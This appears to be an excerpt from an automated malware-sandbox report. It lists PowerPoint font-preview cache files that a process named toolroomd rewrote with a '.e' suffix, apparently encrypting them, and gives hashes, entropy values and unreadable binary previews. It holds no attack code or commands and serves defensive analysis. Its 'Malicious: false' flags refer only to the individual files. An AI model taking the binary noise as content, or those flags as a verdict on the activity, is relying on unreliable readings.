SSDEEP:	48:EPGF0VgnRZpbXxd6B4qdDEQ9wHbxirroumEB5tuZdSRoYGNpq:OGyGvCB6KWx3uF5tuZnju
MD5:	E5B3E72138215ACC3723318D28699290
SHA1:	F8A95665458C840380CC51675A8E92D75EF3022F
SHA-256:	F1555A4B7E7C366410989665462ADC81A1616A75DD9DF0EB442CEF120F96C265
SHA-512:	70096854EA2D2675226AD26E2C6045330F6FB84AB3C262ABD543000501DC9BD18E35F7424E9FB995E7C92A1EE36CE42B4A03506CC6EC664358356B92E6A0C4DC
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a,.c.Fq.-..+tWJ.j..'`..f."#...fw...21...a..OG...yy.N.9E".M..?.hZ..[..e.A).).kk{5)..vC.Z.&Rry.h.v.Hl.An.....A,hLfC..B.hLfC..B..h.u.7f.....l.......#9!.....N....z...H..brpU...$,.......E..GA.ip.o.3.5.vT.}K...6....g=@...4Vo..B.......:9.6>..;.U..rA\|...... ...#.s........KI....;.."....3S........"q..@.+!r.7.........`G.W..E.........g..M....&...\|....r..>YL=......G....h;.jt....4-..j..U..wa.UTQ.6.J...a.Cm......'..h.....p.-....dL.OD.(I..;..k<..%......LF...9...(.. ...../mR.%r.D!.bV.... ........y...@.......P.w.._..l{.......~/RL?......,W.&..>e.b......&.`yx.=]..O....._.....^f]{.9......~...Pujhl5.b<4K9..$..}E....A..,t%.v..D..9_....]...%./.F.:..\..n.9.M8j.I8w.i.F1+......-./5<._...B...1..\...9\|6`.=..D*%$..N..z'm..b.K.z..d.......y...V,.......)M._...c...X..4~........uz7.2./s.........t.'.4.a....../.....}.)...P...FP.A.f.................y...gxZ.^......T.\..N....#.4.p7.....(~1i....uu.uX`?...OOC..i..#.Ef...:&3....

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.BraggadocioRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1370
Entropy (8bit):	7.434557801718509
Encrypted:	false
SSDEEP:	24:EGqdeGcFRPS+tA2838suoLFAPvXv0fBzC6lcRsePc0m7:EG27sg8shL6P3gBzClRNpq
MD5:	6B1A773FDC13A2483A6F3926B29D4791
SHA1:	87F03EFF7C4F98647C348BCBBCC3992703D4C6CF
SHA-256:	F56DF7E39027560D94C75F6CD7DCB77268EA8ACABAD43928418048B0FEACBA69
SHA-512:	1E1CB69C54762E227ADC25BCA0DA1ED4EB38BFEB64B7CFA25EB1E43E42A1A45644BF90E8C6733D1856A8C3B714027FAD61DCE7CA7AAFD5FE038F6278B7E92DDF
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.Z.x.............hTO..)..zX].M.{..dmZ.....6.y.OVtZi..8.>.x.[.8....l.A.....(R.+.....06..k...:..I.d8.6fl.E.Z....d.q.m..}$...S].....Di.v...t.].e..V".$9.W..Z..~.A:....I....P...M..}f.~.w.d'.C..X.++m...L;X...o.A.Hb.....F.Nw./u.. m..........9+..s.\|..........\.F.y...V;1............"..\|J, C...[.....X..x..U...+<s.@.!......c...a..z#T.."8...r>.`.......?.].YZ....i....S...d]...\|.7....l.....A.v..r/.U.B.G.....=% q~...:z..8>.MK':.j......./.9A.... ..o.6.R...\k.[E....p.....9.Lw_...cW....\.RH0...]..@........^^:....G...0I]<.Mr.p.....1.9^..-...]...z.....N9.2.Yc3y{&3Qt....(l..._..`&..n..........W9...2...La_y1 .......%..X.P..P9....5...%....e.-}_.S..1..C.>.FQ.........o.~...xq7..5kh%..............C.e.....X.A...3_....a.k..5.Z...@.g.............%...u..]aHl..G.........'.-9.r.y...}...!EH9{.:8 <..-C.j...w./G......s..2....c..X.himG$t.x.o..1.S.... ../_...........9C.....~~.<...Cgo......{.G..oq4_&Y.G....(.....<Qe......

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.BritannicBold.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1226
Entropy (8bit):	7.357480405628365
Encrypted:	false
SSDEEP:	24:E2P01WLjzMXp6J5Q7e/YaLF3G78Y3iMKnsePc0m7:Ei01WbK6DQ7WLwt3ifnNpq
MD5:	FC6958106BE58CBF0AD362FC84852B4D
SHA1:	8DDE56B6F7514C0DB9C24B30CBAB3886A3534568
SHA-256:	1FA8BC9DA6E14B77425EACEADD44AEB331687648F4C428B21CB72D6FFE7009B5
SHA-512:	940F7BE98ADA77845EC75E3ACF1284D56C4F4979AEFFD82F48E8096198258814B83296CC9EC33943B2C0788B03E5A86F2AC9BA7F27369CB5B5E8A95772C599B8
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a[.B&F....T.q.T......W..~.0.{.}....\|...#..b/c.Iz...].af....<c.v..a.z....V.<3.H...b..q4....Z....~.5..w....I......Yj.U.}o7..H.^..].4p...F.B8reh+.7.t,3.G$...<Hh.z..S]...Uwa...H...Z.&m.._.s...{...&....f...I...........u..V$..e..=a.F..:..s.G...U..h.%..g.y.k.'.w\.$a..$2..6_.K..r....R...~.,<.2P.".s .dnho.......9.....k...3..wi.W....q.<Rf.w.....[....Y..DQP.Vp=..E.R.E(a....76}.@......J.....)u.....X3........f.&...D..8.k/<.$Q..^......\|..u...]...w..4E.p..[)..n..y...P.R.`K..@'qsn.R .s.Yt2.D..V\|1..w...kT.z......N...i...-..!.x.4....;.-~$9.O...(m.#[.m.n..Z%.4...]......Li+.9Ff.....#$.z.])V........-.w.<.A.?.a...!D.X...s.Z,T..d.].!.Xh.g.l..S.U-..q..g.......#Fp.O......yi.]...X.[.;.}..#..;...#.U.Q....G.jf....a..M:..x.p......O:=\|.H.....0M.L.`.P....x..o.3......l.RO.......8..7r.....j.QbwHN..>..D..{.....Yj.f.....ixe.L..0.$j=%...o..zy...................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB.

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Brush Script MTItalic.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1858
Entropy (8bit):	7.635960240757218
Encrypted:	false
SSDEEP:	48:EVt2gwrvuqgTiJ8B6CH2vibwAtUjLwhckNpq:prWYqB6CHL48cku
MD5:	FCB342BFFAB6D888A98BF3D2D5BDA986
SHA1:	A5978DFC28245FBAB8AF12FB88985013A4CF08C0
SHA-256:	7738273B3F61AD2069EF982603CD94A15DF5AA3C0DAFE3B34BF4E64ADFBE8C54
SHA-512:	43189BD05910CA5B1D12546B98FDED59B7A0189F85D519B3DEFC67F0AD5653C84D43BDAFDD944901CA1009F7BB2AD1261485C32529BBEAB30088F6E7534BC2E5
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...R..4.4N4.;37.v...Xo...........sG@...L....h...:RC..K....P....s.....cwE..(."...=.-.l...M.....u..{R...2....;O.E....;O.E....;O.E..J...M3}r.)$.Y.7..T...;.eX..-GF"A+w.u..M$.$...I..._[.`V...K.....R.4..L..r...H%.....?..d..S...{..W.0.....,;WM.......+./..k...{.>2.....l.^.A.QA&6!....5...y/.7X..(.).KD..<.WG..y......?y...Z......i.b....=Z......fn#.&.C$.~.....q;N\ZJ.D... ..&. ...4...rN.K. .}..>...\..G}#...u.._..k....>.L..\|..R..~0.2.~y..g.L.G..[..g......&<\|(.....s........}...gp=....>E....nm-.D.i..9..kR......C....}..@.{.:.g..r.).<..Y..m....sgz>......S..d.9c.A.W...J..Jnl2ht..._.k.d..8.v..;X....p.. ."....~..]5....O.../.q.....'......."...A.......lv...w.T!!...]p...K8z.\|.Wo.!^..E.W.rA..F.F.+.(.%f.S...h..?p....fj.6v.. ...1M`U..A..U.h.Ng.7..d.H...br?....U..z..J.zW.V.?.R..l'0...(......V9.w..ah-3..b...x...<H Z....G.......v..7..i......bi....L`..`..`I.s..=:.Z......$G.<......!..$yz...&~A..r..

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.CalibriRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1066
Entropy (8bit):	7.219370722968265
Encrypted:	false
SSDEEP:	24:EakM9PAhCngF/W8VaB7+ziSkoZ9VsePc0m7:EaJ9ohyCIB7+i+7Npq
MD5:	7CE59B49205FEF1DE0E29CDDFE84C72E
SHA1:	98547EB1EEFC51B120C6198C5CF12FA6AB1373F4
SHA-256:	FC6BE34F86F0A3167AF20C003507CD5EED53CF04125912D50C71985B97CC18B0
SHA-512:	0AE9F1EB3EE56B17E876A5C59B8E94FEACC3076DFFEFBBDDBBEE26D4DDC7245C44F34B37EF27281862EA1824454647DE063B8CECDDA25F50F8B7A5EA270ACECC
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...w.O....p..b.6.6....@..Nu...Di&.....&....E..6('..XQO.}./...`..F....~..J.\|....&>F.M~..#n...\|.3 ;.......~#2R-.-5..r.U.F.vH>]...S..J.........s...z.L......VR..V.h...9.7...h..T#?..UT.[......G@...LR..<k.zS.i....'...8p<..&.U.n.J.....c...I1..bB...j4.zq..x...]..&......{..Y.'.{n.E.hM...W..4V...Bs....7...}.......T..4.&i.u.?c.(.d3....-..T.4.s$..gP..`..bQ.;x.&_.u.H.zw2.*.g..5.t..l..?bD>.S..(exf...g1.....H.R.};..5+..9.8...M..K....F..A_j.R........I.....p..d.->.C.%..%.....2..&.p.-..q.1g.a..icU.9...8...=.)...Q....%...A_.N...m...p....(..$K....s...A...-o-...dP6...E.'kB...j.k.z.>.K..j..:.{.I7..E6..TA..E.4dF..E........CPH$.$j490...Zl~2.N-J.G....qK .H}wg.vK...!.....s..W!.......4........................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..................................................................................

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Calisto MTRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1554
Entropy (8bit):	7.5369584527254485
Encrypted:	false
SSDEEP:	24:EfAl6JwH94nj3dOUwNmvPjXaBQyJFkHcpzDYaXqhsxJbKBrxCDUPsW1sePc0m7:Eo6jYqzFyJFkaI2JKByU31Npq
MD5:	2ED83DC82D7DE9B90F09EA55CB923834
SHA1:	FCDB66FBCDAE74FC82C6F7C8B96A08707ACA8520
SHA-256:	A62B1204CC5BAF0B5C9288478A2FB481AE5208C5094FAE810C1C5E2DEDA305FE
SHA-512:	4E31103ABB14E2FA37402C9B2AE256CB753DB3E3BC72CA4A0F71CD2AEC25DB3A0869B871206C35FEA73E7A23EA01F45291AAFC3A4F213CF465F4BF094A8D3234
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.alQK....!. ......5........o.el..'PT.%.......I.dx...r9....'...,.Yg....[.8m.....#.i1y.d..\....'ug...`.;{4P.$.......qc..+#f... .M.7#GP.X....4.......R{}.#.YlW......_:B......./\|.;G..h^...........Mt>E..`.]#7...Z.$..Y.>M.. -../2.$H.NDp...h ).IG..h5.4C.y1@n...k6..,..3.1.N.%_./..1..(..(q..b..9.r...D.............'...y..O...........pl2\D$....KO..M.ta..8.6_.Jy.4...s.\|..X~^..5..].w$..."R.E.7..g2k.g..V........./%....L.@".A. lAt.;..z6..).r.l.Y.$&....4......ID.-.H/...g.I.f3...HZ...U9hit7.....xE..<....m.+....Rh...k........Y.r,ZC..kv..S1....3..IZ...h.Bf.J.T,G......;0.n.M.^.-NX0N...j."....:J.&.....x.b.a.6;.-+v._........./c\|..h.......S.AhW&-L.Q:..,D..e...S..HL`.u..R..H.k..:..rW.24.Ap....b...F{*.-p./...N?.....,.t.1.A....lO...t...M...@.].o..gP..]...P..#!..-....D.6w..k.@...l.........9K..../.....+.,T....J.(@...Nk_o.z.I^...Z.._......._..Y.2pU.....T......v.(.FA2.'d.....+......J#..!.......\(........4.)DM"...

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Cambria MathRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1618
Entropy (8bit):	7.5607349826968475
Encrypted:	false
SSDEEP:	48:E/OGfkcB5Ic5a0ft+QBEnCfngQ1ptLNpq:5Gf1IL0ft+QGnynlu
MD5:	4D5FDD2FDC6CFDBE047305232BE530C0
SHA1:	BD4F6F0E837203A6419E853E0FD1CD0CDD7FEBC9
SHA-256:	65D15CAAB0E1A4A6F1E8442713F039B83101ADF5C9930527C77DE8FF390C4063
SHA-512:	B517B68B5390CE1EAE1060D6E3B3389EE6992BC2F8EFD3340CBBBE43AFF112ED7F45C8A460303310B97470EC48F6304320C6CC55641D954E95EFB505D4EA99BD
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.....t....^^..\|V..&q...m...5)...N+6`..-.h..F....$fJ..7.\.......\.`4..J>Hx.,h.~A0c&..nC.........v..H.+lQ:......[..Z.k.@.zY.....ox.b...gT...p...9;!S...D.C.dL..x..V.............Q.c..0. p...A...5..X.;./I.4...`...0...= .g..2..v...E.MZ.o..\|..H.G..}xf-.f.S...O........#9..i....n\|.../.(.Fu.q(....2.....i.j.>. .......J.(......G2.yJK.-.v.Ca.VO..o.u>..uG2........(.;.Z..y.'..1.....;.]B.Bx.qi......D..y;...e....:....#...r...a....g4...O.....7).pz.V..J...-/H.@2.'....?q..<./11.....wh.....".....<"Jd........%....w#.m......gB}W.<...m.k.up.1y...dX8..l.&Al.......T.^6R.~.S.>._W. ..4...E. ..O...t.p\.1E..2Q.{.TTJ.p.........._..P{.=..........7zs.R.lL.1..8...f$a^F@.).......:......... .wgC.y.E.>?.S..U..8.8U6......!E...._Vc.:.h5@..n..&5..eh.U=.XJ....x....k...._@..3..R.C..e.YY.w/;....W..9H-E...mg.T.....c8r..S..4.5Y...Z!..l..\|]..}Z*.'.%....1.^.d....6K..Q.l,....B.:lr.......$g=......?..3\|.../%]w7............L..W... V...fK~.....

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.CambriaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1266
Entropy (8bit):	7.3837590089029534
Encrypted:	false
SSDEEP:	24:EU9V2Sg3Yk1+BsskjgmVNyMRLFCG8444jY4sQoXi+6FyBsePc0m7:EbRT/FjgmVdLFCGr49QoXF8yBNpq
MD5:	B35CE3167FA11950A3078213A3374B07
SHA1:	0971A053A8BD3440FB6D7637D093AC6643B9EE79
SHA-256:	BF2FAE56340B08599902A71C567F51B66BE3217E04C8FDBA2C6F70404E7BCA8C
SHA-512:	FABA68A97AC8B7546C971B536BB36459F9CA9112B25F3DC598AF4D1834D3F672B2DE44B63C3DBE68D8F2CA5C9C9D98DBC798B45074458E39BC5A6B1F6E099BEC
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a......5?.~TF`.V.B.Z..F}.../.....ne...<>..m...}.....N.f.#......Y......QV..$.W=...I.cV.i..n..n...lN.~.O.....).`...3.Q....eX.g...(.....o.9c..d.m.P.`.b...v..:..`..}@.L.HaK........{..B)?.. ...nMuU._".Tg....YJ..j....).u#1.D`"D...0G..C.f..;..;..s..S..\|;...rP.m....x.v.?H..wQU.)#.Vc.)............-.wzM.c....?...{....N...?.K[.s....9...b-.<>g..7.R.....R..i4rJ,.....z:..V...5/n.'....V.]k#(.$;...9..6..w..1.h2.^C....S....K3.5......:^..o.0.cX.&..tO..mp....-.i6......T.........Kko..5..bv.\|Cg..J....R...J"n?7?...)v...}...-V..U.0Fb..`.r.\|.u&..{....VQ....O...$..F....!<r..qF...l6B.F.W...g.5..v73.Q.E..)~..fQV>;....8e.f1...b..(HE.~SI...~1b....2......Q..X...V+....`..N.y..lR?`\|....o..";j.].?.1.....7......O...#L.,j....s'.h[.&/.....t_.w......s$%C.].we...J5.Lt.pl2:....t.c..\|.6...Q...kb"O^.*Ac.8f...{.........:....8....e.x..C..q...!8..<q...m.3$.".u.9).d:~o..O.....QU..y...k..~........1..\|h[...................\.........^./k..`R..V

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.CandaraRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1338
Entropy (8bit):	7.434011197363595
Encrypted:	false
SSDEEP:	24:EAgnAzW2LqubRG28SZKQDlPSpXDjo59cHvHS2+N5938nd+sePc0m7:EAgEdbqgp9SGDcPSZEUNpq
MD5:	D6BBD41EF17E05B11596F59DADF1D8B4
SHA1:	A3236B9E948886565BA4958CB9A9D23C20CE0049
SHA-256:	6E1A7D86EE961DDAFEEF45872E703EAAD0277379602740008D0B4B363AA34D77
SHA-512:	4BEB04F21B2C1A5E9F580F03A0E53DC2859821679350F32B6CB4F220EC8195D83DD6A82756AFBD29497FFE09C47DD510C96FFA6E2D0A674C55B7F6B6C3579C27
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a....M}...8q,!...=~.a..w6\|..c...h....k<...]..K.s.F.Um.S#Q.C...y59..Sd.Y[..b,u..o0..f.7.,.5.p..k.....N...]....^............O.wGw..s.s....?[..P8.1..z..w.Go...I.D...n.i..W.,.....jRDtw..........$.ZXq+..y...3.....k..C...W...!m.:#J.p...+..-.9[.0.....#..%....."..K../...o{...M...{.7.q................Y...w.-....Eue.....k...5....z.y#..=a.\h9..Z.....3~...n&.w.GH...>]..-.S.......7[J.k...c..yP....]..mh@..K3<.v.0.......R.V...Z.bUC..^. n...&.........z5#..at..:.S.(..]\|..#...G.........ZGy....!U..y....l~.....Z._...#...#M.+l...5..E9...0.MIi.@.#.-.8.a.xrJ.......3.DKN.l.pYz....#....B...?S.K...W..b.F..lbn.\.J!.X2c.?..1.U.lB.}5..o.5A..C.0...}..jY!..r.........M...f.th....W=.P.\7.1. .BVf{.p.f.)T.....(\|...2.-J.n. ).V.:..b..?..(DW.xSs.:.\r.gQ.........N.8..L..&.........r`..R%.4......Pa.....r..k;....PaYW.m.Az.nC%...ZbN.~.t.V.._vJ.[.......<.....w\|.l.X\.l..>k..r:\..Ln.su..wZ....'P\...X...$.v%.S2..-.d.u.;S..M6...Q,..4"...&..

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Century GothicRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1682
Entropy (8bit):	7.559863815326164
Encrypted:	false
SSDEEP:	48:E7dkbk1+UYvTMdoXJAV1z8bKk4zMCKfNpq:o+bkoUYTMdFYbnoBKfu
MD5:	9C619BB748008D777A11B61DB2103103
SHA1:	2170F70771DDDA18C19AA5FFFD33C5828A28E023
SHA-256:	E3694878C2859E5013969A97BAE606AE633F613BE6BD5DA444D73106C021138F
SHA-512:	A1CF58E3F6763E7C92D905DEC2E58BB3951ED2BDB7AF9B5ECEFAB914873C606F585DA42AFDD3AD28E403BF0ADE093CCBCF2CB832D88EB6ED871165D9605303DF
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.ay~.~f\|...T.a......!.M?X.[D.@H..4....A.\|._X...jj..d..G.........?...W.B. ...k2.5)...>..;W...L..k..>..[..Yq.~...Yq.~...Yq.~...Yq.~..P..vT$.3>.n..{.;..).tw....R..T.(...q......[....^J.qj..AU.`.............n..os..-.....LI.3Rmb.=K....{....!.......z.....!....Q8.........(....J...m#.u. R..Ln.;..0.jh..u.O7..e....`B......O..MU...:w.OS.X.t.9.0<....w.m...-1.K;..]..~..."..K0.[.B^.....t.&.........S.+@.....F,.c{\|E.v....TZ.!.{}..kX....\_@..\|.......ar #.._..G......A...E!>..@..E..V...-.[#~...F.L...gVv../..d 90..9.GvAw.TP...@vH.$C....&...X-..KY9Y.`W.&../.._...G.p.?^K~..a......YvkB.....:...3{..../..9.......mz..w...G......!.......C...O}..l../.o/Ik..WI..O.4..S.....WW..p<77.tY.s...]+...h"...3.<..V...7=..r.......E..}..'..B...=..@.<....q...F...L..e...$....#.T.Utb...l.qQ....2...aR..S..v..&5..*.8.L.(`....jb.v....:..@P.p.eyg..W.....:.72........G.........5./RR..b........T._@}..4.3L...."..o[.../.h&`b.f..p..R..<....H.

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Century SchoolbookRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2018
Entropy (8bit):	7.663329366794151
Encrypted:	false
SSDEEP:	48:EQ5lJv0WThAYfy5gPg1T62NuB4cbvoNpq:zliWNAYfyyPS22Nuucbvou
MD5:	5352289CBF06D2CBF62EEABCDCE6D7ED
SHA1:	95BFA7BFF0F952F0DE503ACCE10806680EEB4E1A
SHA-256:	17D41A74CCFDD722359FBA9D8525526D0E20E6ABE55F4DA7D40A972C7ED8B040
SHA-512:	378C9D71FC7FADF943CCD1A1FFEB4C4CDAE7133FDB50AB69AA6C50001F2E90EACDDF43872BFD0338F2095F02E75D9166B2B2593F6475AE2C170497BD1E2B64B5
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.?.. .y.).u.o.'.+..pL.<...z.df...]....W.2~..[.t..G&U..t..c!.L.v~=[...Ha...F.9Au..;..@....{...}.K.H..Q>........U.I."...U.I.".=U;.azcp........O..m..H..u.....9..U~W%Q=E1^...R..h.f~.......mW.t.M.-.k.c?..=/C .......S......\|.....OIj.;.(Y.z..\.n.lg.`H.!..b..(X..8.O......I.#...ub...1.O.....n.l.1..j.....]6T3+QW.....C2..e..[......U#..#...X..1.^.s...S....=&.....G.e.B.(.o.]_.k.(.l...a-.^ .v..~.@.\|.F......-..:.~$r...d..e...{..."=....N.vL..>....n(.z....@f$......\....@.....(.^.&.yJ...._g..).7.f....+<2..~\.......9../..n.(}2......B.W..5...A.:E..".?......V.;......\l+R..{.@..N....GoE7....~F.Gw..R.....1.L.......A...WSq.k..(..0..r_4}....3B.X$..4?.........@....E...<..4P.l.R..ya.j.H.`.{.].........9.8..q.[.-2z..z...sL..A..`{]..9b.o......Y.R..b..V..e.........`..JN..?.O...KB.g`.d.....e..A:.?1.@.ue.^d2O.q.{.n..)...;.2...A..."........L&...S6"~3..x....K.......9....AB...[.....A.`.w.I..1mNm.7....T....2.~..a.l.7=8........

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.CenturyRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1218
Entropy (8bit):	7.321881957711698
Encrypted:	false
SSDEEP:	24:EbETgdpQ9R+yqph60EPhMNIC+c41Bed4ppQRLZLsePc0m7:EbEs+H+PphpEGbL4yd4EXNpq
MD5:	0745C0C114603FCC7C8164322BBB6881
SHA1:	0DB2E5B1F6F407114CA10395DB39A9D1D41F0427
SHA-256:	8E94C8EFC29C5F2D4A1EAB6D3FBFA87DA69970607FCD5D2F6824D4F25849D51F
SHA-512:	E9A9FBC666C4272ACA0D9D7B585B8D635495DEEE9C635DD731AD34D79A043964536CDCA1AB6F2625FE73B7B7991C4B0F0238B7D8735FB9B84298E63ACE4BA508
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..........M^.;..........Nq...Q.I.G.....(u.>.X...{^$4........W..\|8...Z{.d.Jq.Z.o..`.c....\|.{q.v....f...!.6..@..i.#~.}...s.=.R,...X..Id:..[>=...@..yRKM....J.\......c.V...<\.\|.(O}..^.8..uqJN.....6..f8..dC.C:I.....g.>0...?.OJMdr....D..@.....P.J............+.....q.F5U.M.P.y........WV.IH...e.....wE..n....\|....w8....A..zX....E........`W.....L....U....>...Z........J.l.E.~.]\|...T....J.+,+.A.......a..?.=e.Y.=Uo..U.U'.w.KS..v...............Q.....,._JG...ai_...G...z0w8.sw7Y..j..A.e......\4.A.t.p/w..&.!)T...7\|g.._.B..pG.?=...1.XH...+S....=.z......Tk...6....}..j....i.....DF@.k...a.{.m......CU........E.:Ah%E..&.y....m.......E.K....L.B.k..l"=.?....>M.+..x.l..6]......iE.y.W%P,...-..%ay..!.D...\|....6.HPg.<.Gw....ODx?y.......$h...'.h%...0l.9..>....#.Y.95....1\|...B.m...B.A%w.l..\.+...Z$..D....T......A!...mM......S..._v..<.Y.....................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Chalkboard SERegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1922
Entropy (8bit):	7.636910765360632
Encrypted:	false
SSDEEP:	48:EzWcBRc78sWHmsIvz62oqkV7mfVDx1DNpq:6S8sWH/bFmfhu
MD5:	ED7D72F3ADED7B78047D9E042B21B87D
SHA1:	7AE0274D4CE317D5E3002B58B1AF4EEEE21B87E5
SHA-256:	1E911866B0EFFABBAD6796267E5850823DF968D7E0523643970C729599C7B92A
SHA-512:	35E5138400718447DD261505F15660D2EBC340AA84350AC7A5342B9F866A1167009279751C9518A7D878F0720E625A2A064E6AE6F2C0A035E671D8E2477B4444
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..6...w.[...>.6V.vHN..D....%.J.....~.6...H....m........fB>.>.T'.v.....F...n(.....7M.L.......x.&e.q...7~.:.....:.....:.....kQ.l..xI...........R...6..K..07.....cW..X..@.K.P.x.X.."....vA.u....h..yY......4.g'FQX..]...a.4....\.{.g6F..`L..4...i<.\|e$......nq.T..\.X4......Z....aW..g..c........\....t..a..a...Cu=;../.Q.2....gZ.99.8e...6..h..v95..Q.i.....>...-R..f.n.b6..Z..3..G...y.......RU..d.....).I....8Jf.\p.C@...>}....y..<.{....-d.>..g...O}R..Y.^..-_..z,..#.{!....w.Y....b;..<...oN:.Z..i?...j....r..v/.%..T.(..D'...\|.'.........y..Yo...5.+}.CX.....4_.e.........sw!.......>.;..v..."/uH...oG.#..H.u.O...9.@.1..pY...k..."K..e.!......X.<.i4#....GJ.X.H..d..T......k.&2....&.+..v.MS)..O@....=.0....Ow.Z..\.!..s.7Gu6.i.v.....y....8...M].cd..u.< 4V$.j........D..).$....].V(?m..N.......`1..vxx.T.N{.....v.ei m@V....BW(..'Z.r..45..h...(....g.\.0.s..\.$..W..*.G....!h...dP.Oq....Q......B......_.$..Mh.

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.ChalkboardRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1602
Entropy (8bit):	7.544830792958256
Encrypted:	false
SSDEEP:	24:E++NPeHrGblbZfjniGjUB8FPMDKyxPuUSWCzc++sVJvIqQWb/sePc0m7:EvErGJRTvUB8FPmKylSIoJL7b/Npq
MD5:	36BCD77B26440033F5ADEDD238FF7A8E
SHA1:	8224AC8C2509F053A3F852FA0158C90660673F7C
SHA-256:	DD2D5E5CD61B2A0D4C07EBC98BB627BB8ADB2401C76C9051998DAF668FF9F842
SHA-512:	18F3B7FE0DDC042E2C5B1CD2BD2AAB7A31AE8F8F75613259086466FD5710F9231CCF92015CE66CEC40E12D800EDACDA86CDD14193D4874F392590400DD9FC867
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...........~....:6\....xQQ.2...l.....>l..>....j^z..<e02.i..f...HDW.z.Ng...b$U..i.m0...`.AA_......c.=...H......IM....MQ......=...83..y.DU.jE..W..R.7i.....:...z.....\|.....s.w.....5..".\|.^.h....7.D.s.LwK.&\....Il..h.E..A..........8&Jy..1.z.).Y+..>. .........eo.._.......].c.M.Px.WU..e.M..D....A..5.;c.P.#.tQ..R^..b.t..$...o.W....o...C.$B.#.Sn....y..._Z..Ov./..S.si;...0O.....ZFY .d... .u.^.l..No8.q......4.Xt.C.V....8.w .P.W....t0Q...q....>.{\...u..l.Z.N.H..'..2.V...o-.....(lU.G....<.E3.u.+..^;.....Rd..bV.I.6^.Hw.qY..!7v...@.....,.@..]v....sR..B..k....X\.M... w..+. ^...;]r.....J,cW\|.N.....c.@.U..X..@L8n....\j..f/...5g.G...)...6{....~.7..d.......Q.2f6@f.8..~d4#......\........H.F..7`...@V......@y.vb.\t.;.....8..._[..x...?......-.D..ws......qT..G.<.R.y..0..`..!.........h.8?.J^.q....=i]....R.[.......7.......S...y..9_.H....v...~tV.n.......t..!.......S......e..y..4..@.....f..rF.j.At=\W=P.

/Users/berri/Library/Containers/com.microsoft.Powerpoint/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.ChalkdusterRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1938
Entropy (8bit):	7.642448926562922
Encrypted:	false
